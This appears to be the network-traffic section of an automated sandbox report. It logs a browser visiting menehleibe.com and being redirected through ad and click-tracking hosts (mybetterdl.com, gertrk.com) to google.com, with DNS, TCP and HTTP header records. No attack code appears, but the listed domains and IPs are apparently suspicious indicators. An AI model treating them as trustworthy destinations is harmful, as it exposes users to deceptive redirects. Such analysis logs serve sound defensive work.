                                                                                                                                                                      Sep 14, 2021 16:03:24.976684093 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.976711035 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.976773024 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.979940891 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:24.980214119 CEST44349757142.250.102.106192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:24.981053114 CEST49757443192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:25.017545938 CEST4973780192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:25.120173931 CEST8049737173.239.8.164192.168.2.6
                                                                                                                                                                      Sep 14, 2021 16:03:25.330677986 CEST4973880192.168.2.6173.239.8.164
                                                                                                                                                                      Sep 14, 2021 16:03:25.331146002 CEST4974780192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:25.331173897 CEST49745443192.168.2.6168.119.139.96
                                                                                                                                                                      Sep 14, 2021 16:03:25.331183910 CEST4974880192.168.2.6142.250.203.110
                                                                                                                                                                      Sep 14, 2021 16:03:25.331199884 CEST4974980192.168.2.6142.250.102.106
                                                                                                                                                                      Sep 14, 2021 16:03:25.331204891 CEST49740443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:25.331213951 CEST49742443192.168.2.6173.192.101.24
                                                                                                                                                                      Sep 14, 2021 16:03:25.333533049 CEST4975080192.168.2.6142.250.102.106

UDP Packets

                                                                                                                                                                      TimestampSource PortDest PortSource IPDest IP

                                                                                                                                                                      DNS Queries

Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
Sep 14, 2021 16:03:19.723831892 CEST | 192.168.2.6 | 8.8.8.8 | 0x9451 | Standard query (0) | menehleibe.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:21.819623947 CEST | 192.168.2.6 | 8.8.8.8 | 0x1065 | Standard query (0) | mybetterdl.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:22.631850958 CEST | 192.168.2.6 | 8.8.8.8 | 0x9179 | Standard query (0) | p226681.mybetterdl.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:23.476247072 CEST | 192.168.2.6 | 8.8.8.8 | 0xd2e1 | Standard query (0) | gertrk.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.063437939 CEST | 192.168.2.6 | 8.8.8.8 | 0xb4d3 | Standard query (0) | google.com | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.214965105 CEST | 192.168.2.6 | 8.8.8.8 | 0x6538 | Standard query (0) | www.google.com | A (IP address) | IN (0x0001)

                                                                                                                                                                      DNS Answers

Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com | | 173.239.8.164 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com | | 74.206.228.78 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:19.756581068 CEST | 8.8.8.8 | 192.168.2.6 | 0x9451 | No error (0) | menehleibe.com | | 173.239.5.6 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:21.848687887 CEST | 8.8.8.8 | 192.168.2.6 | 0x1065 | No error (0) | mybetterdl.com | | 173.192.101.24 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:22.679900885 CEST | 8.8.8.8 | 192.168.2.6 | 0x9179 | No error (0) | p226681.mybetterdl.com | | 173.192.101.24 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:23.514079094 CEST | 8.8.8.8 | 192.168.2.6 | 0xd2e1 | No error (0) | gertrk.com | | 168.119.139.96 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.098937035 CEST | 8.8.8.8 | 192.168.2.6 | 0xb4d3 | No error (0) | google.com | | 142.250.203.110 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.106 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.105 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.99 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.147 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.104 | A (IP address) | IN (0x0001)
Sep 14, 2021 16:03:24.244478941 CEST | 8.8.8.8 | 192.168.2.6 | 0x6538 | No error (0) | www.google.com | | 142.250.102.103 | A (IP address) | IN (0x0001)

                                                                                                                                                                      HTTP Request Dependency Graph

                                                                                                                                                                      • menehleibe.com
                                                                                                                                                                        • mybetterdl.com
                                                                                                                                                                        • p226681.mybetterdl.com
                                                                                                                                                                        • gertrk.com
                                                                                                                                                                      • www.google.com
                                                                                                                                                                      • https:
                                                                                                                                                                      • google.com

                                                                                                                                                                      HTTP Packets

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.6 | 49739 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.6 | 49741 | 173.192.101.24 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
10 | 192.168.2.6 | 49748 | 142.250.203.110 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 14, 2021 16:03:24.150072098 CEST | 1064 | OUT | GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: google.com
Connection: Keep-Alive
Sep 14, 2021 16:03:24.203008890 CEST | 1071 | IN | HTTP/1.1 301 Moved Permanently
Location: http://www.google.com/
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Sep 2021 14:03:24 GMT
Expires: Thu, 14 Oct 2021 14:03:24 GMT
Cache-Control: public, max-age=2592000
Server: gws
Content-Length: 219
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>301 Moved</TITLE></HEAD><BODY><H1>301 Moved</H1>The document has moved<A HREF="http://www.google.com/">here</A>.</BODY></HTML>


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
11 | 192.168.2.6 | 49749 | 142.250.102.106 | 80 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
Sep 14, 2021 16:03:24.290153980 CEST | 1071 | OUT | GET / HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.google.com
Sep 14, 2021 16:03:24.355325937 CEST | 1072 | IN | HTTP/1.1 302 Found
Location: https://www.google.com/?gws_rd=ssl
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Tue, 14 Sep 2021 14:03:24 GMT
Server: gws
Content-Length: 231
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
                                                                                                                                                                      Data Ascii: <HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8"><TITLE>302 Moved</TITLE></HEAD><BODY><H1>302 Moved</H1>The document has moved<A HREF="https://www.google.com/?gws_rd=ssl">here</A>.</BODY></HTML>


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
2           192.168.2.6  49743        168.119.139.96   443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
3           192.168.2.6  49744        168.119.139.96   443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
4           192.168.2.6  49746        168.119.139.96   443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
5           192.168.2.6  49751        142.250.102.106  443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
6           192.168.2.6  49752        142.250.102.106  443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
7           192.168.2.6  49755        142.250.102.106  443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
8           192.168.2.6  49757        142.250.102.106  443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
9           192.168.2.6  49737        173.239.8.164    80                C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data
Sep 14, 2021 16:03:19.921633005 CEST  1024  OUT  GET /images/bjM3gVEtKlUeWm2NnKw3/UycpbcugJuZhqNGVGh8/kwk4esZ_2F2xjDYD_2BSa_/2F328cjxY6AQM/kA5SneVc/JKL1AVTBXoV77D1JaKVgbri/d8lSYHOR5C/_2FOPoUzuMMso_2Bp/A_2Ffbx4wppa/aSm6IWIjM6R/Y44GbYY.avi HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
Sep 14, 2021 16:03:20.024328947 CEST  1024  IN  HTTP/1.1 302 Moved Temporarily
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:19 GMT
                                                                                                                                                                      Content-Type: text/html
                                                                                                                                                                      Content-Length: 145
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Location: http://menehleibe.com/
                                                                                                                                                                      Data Ascii: <html><head><title>302 Found</title></head><body><center><h1>302 Found</h1></center><hr><center>nginx/1.18.0</center></body></html>
Sep 14, 2021 16:03:20.027059078 CEST  1024  OUT  GET / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Connection: Keep-Alive
Sep 14, 2021 16:03:20.137682915 CEST  1025  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:20 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Content-Encoding: gzip
Sep 14, 2021 16:03:20.611062050 CEST  1025  OUT  POST / HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: menehleibe.com
                                                                                                                                                                      Content-Length: 12
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                      Data Raw: 69 63 3d 30 26 66 62 3d 74 72 75 65
                                                                                                                                                                      Data Ascii: ic=0&fb=true
Sep 14, 2021 16:03:21.647305965 CEST  1027  IN  HTTP/1.1 200 OK
                                                                                                                                                                      Server: nginx/1.18.0
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:21 GMT
                                                                                                                                                                      Content-Type: text/html;charset=utf-8
                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                      Set-Cookie: ipc=eyJ2ZXJzaW9uIjoxLCJzdWJJZCI6MywiZm9sZGVySWQiOjEsImZlZWRJZCI6MjEsInRzIjoxNjMxNjI4MjAxLCJoYXNoIjoiN2E3ZmJiNTgifQ==;Expires=Tue, 14-Sep-2021 15:03:21 GMT;Max-Age=3600
                                                                                                                                                                      Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                      Content-Encoding: gzip


                                                                                                                                                                      HTTPS Proxied Packets

Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
0           192.168.2.6  49739        173.192.101.24   443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data
2021-09-14 14:03:22 UTC  0  OUT  GET /aS/feedclick?s=PmRMc57CnhYhj70e-I9ky5kfJerKhwxlfSMU3tyux_x5AGZrWUPSJmPzN2c9f2E7_vAN-6p8GpmDZG8TCuTZ6pDoEwlyap2kZsgzB4lH00ug8e5ExIzs-GByJkw_hnoLHWVUL2gXgUyatsBFMaSTc1RQ5RxkQPBqyyTn3ctXNy_0uSHRSxkmOy8VHMc85GIOT4jmse8Hco-FpMlb9RHx56VxjN2QtFN197vLrfkZ9qE509t5aRYfk0fTaZIGwGtVFx6Cjc1It8vKVodI2QoCnLeLuzBqxrSYHinyRIiR6SzTXaBf9PH6fc538M5WEvMvhjauUHGubj961r75KUjKtSXnHatHqEuiyuTMyWjRyjCKMGCurZS8_bcUa4tJgkiTyXdC5k_Q4CBuzEhgKlo_tO4ZCxjCqbxJk5Qzkw_MwwsEKwa-Bh_puw260HEYWHbHAxhhGdlJM-I_t1xxhVv3SQmb2uwb95RlGM7AqpOHVVF6EgPkt4a55MyZVnXuVkgrUl1akVOciihIlqaZoSoe2Ylzr70WFqgr6AhoabQSBzCjuJYNp4gwUYV0VWvRZajmUWO_Vxo8ML-hjUsrPH807AqUmDxuY4v8inEoo-y-qnyU06p2Uh3Pw9YdNYD58IK4CKCGcA-Uam9dcss-T-5Iub4J15H67wFZ2snzzWpWzEKC9XUORoe_dbnEgAhHx_n7Z4tVOYdW5lW6ruDPqaeHc0uzcTU9bgm_in-W2l5vorxPFmQaTFIcy4B5guOnMJ5yZHLQD576xYWbP03aM83dTwE3kMpnzCC1V5B-3hXd5pzfx17GSZUu2KHXImolykrmTazGZKmMBhE5rzai4ARXglTM7lPAlIssdjgnlOgBObVnL6dMrNPV4wycVX3s5OxtJMXedCWE2r5biNOcX3y5Pmw-0BUdBZv7MvlSTP2Fk9AaabOem2Q73GpjsG_dwXVnUc2FH6zZuqWu2Dli66C-XucADfX2tBPlR3prQOfp40mttv00_iCR6q6fLI9QZgGY11WgfO3qdEgV2xwoj0eGTIxBicwTEMicE9X3AYQsCpAEn3pdnGSoQpHTA7Kz9fo94mKnTULy2teQgTesP9hhxLreOeHrbCzwHSSbH-FJZx15JZAYCxI8gV6bvS4IWlDg_vysGgTqrjiFCjhA5kocz54NYxtQVvyXSZspRWMKjI1QYN8ennj2JVFvWfYyzeLbGr1ovqBCtNBvJi2ztcTgBlsW0SM8XIsRgd4QMcWZcycyUPzb9Wd1bDxFTAWmSXH43ynD5UObBi5FyNDw8qKKmoCnfedHiztWYQxKotKUGaKd1m_k2iMIc5SBU1Vi7-MGW4_Mi4WYIzJL61eBLaioPhng2BQ6PDt8aAWdDMho29RkRFHVPIQb3W3nWMGo8srLOHYnfrFRuEDgcm6cqkr2IQD0T7sB-GexA77NdWEi2cdlkkLEB146pQ HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Host: mybetterdl.com
                                                                                                                                                                      Connection: Keep-Alive
2021-09-14 14:03:22 UTC  1  IN  HTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:22 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:22 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://p226681.mybetterdl.com/adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0


Session ID  Source IP    Source Port  Destination IP   Destination Port  Process
1           192.168.2.6  49741        173.192.101.24   443               C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp  kBytes transferred  Direction  Data
2021-09-14 14:03:23 UTC  2  OUT  GET /adServe/domainClick?ai=qR193HoKV_skvRDJ1Xl7Z2EMSqLSlBmindZv5NojCHOwn03uCMUnWWP1f_rG7YbjKg1peh-_obzBIj3uZHPpnj9EVoFzCvr6nUsZVZhWVPP-29LJmEHdmZ7b6Qy9a1mHTiLNxNNj-331YCaynPT02WREUdU8hBvdAVtzW-BnG_JiVnQIGgxQDiU7ugF2M-yuSZspRWMKjI0oZaL4_NY6BA8B78vhYDGtjMUdyxHqWTbxnarhY6PRQCoyupr1mhPBjhdEqJB6Nj2XmDvYXWw9hp-qFZn5gpnPqtE9sbJicJwX2fEbVjxB9kp2QAzznS8_6fjhgUFt3sQISiZ3D8mF7LCm2HeI0S938_gGwpSXr3tSAMcY_H2x07HFovOGSDpNKiXhLmiyflhHQ2DhJtv57Pgpt-TBvcxCEwrLEAaOW_go6oM85zEqQcFJgSFbjHo8VjLddbnKrYw&ui=PmRMc57CnhbNSfHhL5kCGmvi5v6ZZrF7dLiTNq3P25qokS0sVeF3FkXI0PDyooqap4CS6zytrLbvtEDBZZLJWA-odODn3W3LTPqV0hvm1VqP--qZkGGf_8AXd3hExnhV&si=1&oref=a606ca39dc85b39bdaa2bf88832fa198&optunit=SZspRWMKjI3Y6yHw-JV9WQ&rb=mhdAWEBiphk&rr=1&abtg=0 HTTP/1.1
                                                                                                                                                                      Accept: text/html, application/xhtml+xml, image/jxr, */*
                                                                                                                                                                      Referer: http://menehleibe.com/
                                                                                                                                                                      Accept-Language: en-US
                                                                                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                      Host: p226681.mybetterdl.com
                                                                                                                                                                      Cookie: rhid=79630578833
                                                                                                                                                                      2021-09-14 14:03:23 UTC3INHTTP/1.1 302
                                                                                                                                                                      Server: nginx
                                                                                                                                                                      Date: Tue, 14 Sep 2021 14:03:23 GMT
                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                      Connection: close
                                                                                                                                                                      Set-Cookie: rhid=79630578833; Max-Age=15552000; Expires=Sun, 13-Mar-2022 14:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Set-Cookie: loi=ad_1007735_off_459698_aff_88561_cid_226681-MENEHLEIBE.COM_ts_1631628203; Max-Age=3600; Expires=Tue, 14-Sep-2021 15:03:23 GMT; Domain=mybetterdl.com; Path=/; SameSite=None; secure;
                                                                                                                                                                      Location: https://gertrk.com/click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.6 | 49743 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:23 UTC | 4 | OUT | GET /click.php?key=qxr7sx5xq96osnrqgm1a&subid=87057224030&bid=0.025&site=413999995&source=413999995&clickid=87057224030&browser=Internet+Explorer+11&geo=CH&campaign_name=CH&device=Desktop&os=Windows+10 HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://menehleibe.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gertrk.com
2021-09-14 14:03:23 UTC | 4 | IN | HTTP/1.1 302 Found
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Set-Cookie: uclick=16bzxofy; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
Set-Cookie: uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c; expires=Wed, 15-Sep-2021 14:03:23 GMT; Max-Age=86400; path=/; secure; SameSite=none
Location: https://gertrk.com/nlp/index.php?url_bnm_redirect=http://google.com
Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC | 5 | IN | Data Raw: 30 0d 0a 0d 0a
Data Ascii: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.6 | 49744 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:23 UTC | 5 | OUT | GET /nlp/index.php?url_bnm_redirect=http://google.com HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Referer: http://menehleibe.com/
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: gertrk.com
Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:23 UTC | 5 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:23 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Strict-Transport-Security: max-age=31536000
2021-09-14 14:03:23 UTC | 6 | IN | Data Raw: 33 65 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 72 65 66 72 65 73 68 22 20 63 6f 6e 74 65 6e 74 3d 22 30 3b 55 52 4c 3d 20 68 74 74 70 3a 2f 2f 67 6f 6f 67 6c 65 2e 63 6f 6d 22 3e 0d 0a 30 0d 0a 0d 0a
Data Ascii: 3e<meta http-equiv="refresh" content="0;URL= http://google.com">0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
4 | 192.168.2.6 | 49746 | 168.119.139.96 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 6 | OUT | GET /favicon.ico HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: gertrk.com
Connection: Keep-Alive
Cookie: uclick=16bzxofy; uclickhash=16bzxofy-16bzxofy-h9-0-ci-wh-4p-268f1c
2021-09-14 14:03:24 UTC | 6 | IN | HTTP/1.1 200 OK
Server: nginx/1.18.0
Date: Tue, 14 Sep 2021 14:03:24 GMT
Content-Type: image/x-icon
Content-Length: 5638
Last-Modified: Thu, 30 Aug 2018 21:25:42 GMT
Connection: close
ETag: "5b8860d6-1606"
Strict-Transport-Security: max-age=31536000
Accept-Ranges: bytes


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
5 | 192.168.2.6 | 49751 | 142.250.102.106 | 443 | C:\Program Files (x86)\Internet Explorer\iexplore.exe
Timestamp | kBytes transferred | Direction | Data
2021-09-14 14:03:24 UTC | 12 | OUT | GET /?gws_rd=ssl HTTP/1.1
Accept: text/html, application/xhtml+xml, image/jxr, */*
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Host: www.google.com
2021-09-14 14:03:24 UTC | 12 | IN | HTTP/1.1 200 OK
Date: Tue, 14 Sep 2021 14:03:24 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
Server: gws
X-XSS-Protection: 0
X-Frame-Options: SAMEORIGIN
Set-Cookie: CONSENT=PENDING+509; expires=Fri, 01-Jan-2038 00:00:00 GMT; path=/; domain=.google.com; Secure
Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-T051=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43"
Accept-Ranges: none
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
                                                                                                                                                                      Data Ascii: ogle.c.ubr=function(){})};}).call(this);(function(){var b=[function(){google.tick&&google.tick("load","dcl")}];google.dclc=function(a){b.length?b.push(a):a()};function c(){for(var a=b.shift();a;)a(),a=b.shift()}window.addEventListener?(document.addEventL
                                                                                                                                                                      2021-09-14 14:03:24 UTC22INData Raw: 2c 4b 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 76 61 72 20 64 3d 4a 3b 64 2e 67 3d 61 3b 64 2e 68 3d 62 3b 72 65 74 75 72 6e 20 64 7d 3b 49 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 74 68 69 73 2e 67 3b 74 68 69 73 2e 67 26 26 74 68 69 73 2e 67 21 3d 74 68 69 73 2e 68 3f 74 68 69 73 2e 67 3d 74 68 69 73 2e 67 2e 5f 5f 6f 77 6e 65 72 7c 7c 74 68 69 73 2e 67 2e 70 61 72 65 6e 74 4e 6f 64 65 3a 74 68 69 73 2e 67 3d 6e 75 6c 6c 3b 72 65 74 75 72 6e 20 61 7d 3b 76 61 72 20 4c 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 68 69 73 2e 6a 3d 5b 5d 3b 74 68 69 73 2e 67 3d 30 3b 74 68 69 73 2e 68 3d 6e 75 6c 6c 3b 74 68 69 73 2e 6c 3d 21 31 7d 3b 4c 2e 70 72 6f 74 6f 74 79 70 65 2e 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b
                                                                                                                                                                      Data Ascii: ,K=function(a,b){var d=J;d.g=a;d.h=b;return d};I.prototype.i=function(){var a=this.g;this.g&&this.g!=this.h?this.g=this.g.__owner||this.g.parentNode:this.g=null;return a};var L=function(){this.j=[];this.g=0;this.h=null;this.l=!1};L.prototype.i=function(){
